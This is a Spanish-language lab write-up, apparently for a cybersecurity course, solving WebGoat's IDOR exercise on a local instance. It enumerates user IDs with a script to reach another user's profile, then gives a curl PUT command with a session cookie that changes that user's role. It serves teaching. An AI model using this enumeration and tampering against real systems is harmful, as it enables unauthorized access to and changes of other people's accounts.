# Introducción a la Ciberseguridad - Vulnerabilidad A5 Insecure Direct Object References (Apartado 5)

## Ver perfil de otro usuario

Conociendo el endpoint [*http://127.0.0.1:8080/WebGoat/IDOR/profile/{userId}*](http://127.0.0.1:8080/WebGoat/IDOR/profile/{userId}) se puede tratar de obtener la información de otros usuarios probando diferentes *userId*.

En el ejercicio se plantea obtener el *userId* de un usuario cuyo nombre es "Buffalo Bill". Sabiendo que el *userId* del usuario "Tom" es el "2342385", se pueden probar los códigos superiores (o inferiores) para encontrar un usuario cuyo perfil contenga el nombre buscado.

Se puede ejecutar el script [try_userId.sh](./try_userId.sh) para probar los números de *userId* superiores hasta que se obtenga la información del usuario "Buffalo Bill":

```bash
./try_userId.sh JSESSIONID=-H5HZbOnSOARNbUTYZfuEU5GR47bcbB25Ys-i5_A
```

El resultado obtiene el *userId* "2342388":

```text
Checked user ID 2342385 invalid.
Checked user ID 2342386 invalid.
Checked user ID 2342387 invalid.
User ID found: 2342388
```

Realizando la petición en el navegador en la dirección [http://127.0.0.1:8080/WebGoat/IDOR/profile/2342388](http://127.0.0.1:8080/WebGoat/IDOR/profile/2342388) se puede consultar la información del perfil del usuario "Buffalo Bill":

```json
{
  "lessonCompleted" : true,
  "feedback" : "Well done, you found someone else's profile",
  "output" : "{role=3, color=brown, size=large, name=Buffalo Bill, userId=2342388}",
  "assignment" : "IDORViewOtherProfile",
  "attemptWasMade" : true
}
```

![Insecure Direct Object References, View Another User Profile](./img/01-a5_idor_05.gif)

Si la búsqueda no hubiese tenido éxito, se podría haber intentado buscar la información con los *userId* inferiores al del usuario "Tom".

## Modificar perfil de otro usuario

Utilizando el mismo endpoint, pero con el verbo *PUT*, se puede modificar la información del perfil de otro usuario. En este caso se va a establecer el *role* con valor "1", y el *color* con valor "red" al usuario "Buffalo Bill" (se ha reutilizado la *cookie* capturada en el punto anterior):

```bash
COOKIE=JSESSIONID=-H5HZbOnSOARNbUTYZfuEU5GR47bcbB25Ys-i5_A
curl -X PUT -H "Content-Type: application/json" --cookie $COOKIE \
  --data '{"role":1, "color":"red", "size":"large", "name":"Buffalo Bill", "userId":2342388}' \
  http://127.0.0.1:8080/WebGoat/IDOR/profile/2342388
```

![Insecure Direct Object References, Modify Another User Profile](./img/02-a5_idor_05.gif)
